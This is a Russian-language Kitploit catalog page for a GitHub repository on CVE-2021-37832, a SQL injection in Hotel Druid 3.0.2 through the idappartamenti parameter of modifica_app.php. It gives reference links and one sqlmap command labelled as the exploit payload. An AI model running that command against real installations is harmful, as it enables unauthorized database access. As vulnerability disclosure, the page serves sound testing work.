Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-37832 — CVE-2021-37832 - Hotel Druid 3.0.2 - Уязвимость SQL-инъекции - 9.8 CVSS 3.1 | Kitploit
Инструменты/GitHubGitHub/dievus/cve-2021-37832
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubdievus/cve-2021-37832

CVE-2021-37832

CVE-2021-37832 - Hotel Druid 3.0.2 - Уязвимость SQL-инъекции - 9.8 CVSS 3.1

Репозиторий
4135 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE 2021-37832 Hotel Druid 3.0.2 Уязвимость SQL-инъекции

Уязвимость SQL-инъекции существует в версии 3.0.2 Hotel Druid, когда в качестве базы данных приложения используется SQLite. Злоумышленник может выполнять SQL-команды в базе данных SQLite через уязвимый параметр idappartamenti.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37832

https://nvd.nist.gov/vuln/detail/CVE-2021-37832#match-6858716

Уязвимая PHP-страница:

modifica_app.php - параметр idappartamenti

Эксплуатирующий пейлоад

sqlmap -u "/modifica_app.php?tipo_tabella=appartamenti&anno=2021&id_sessione=&idappartamenti=01" --level=3 --risk=2 --banner --dbms=sqlite

Обнаружено Джо Хелле, июль 2021 года

Скачать инструмент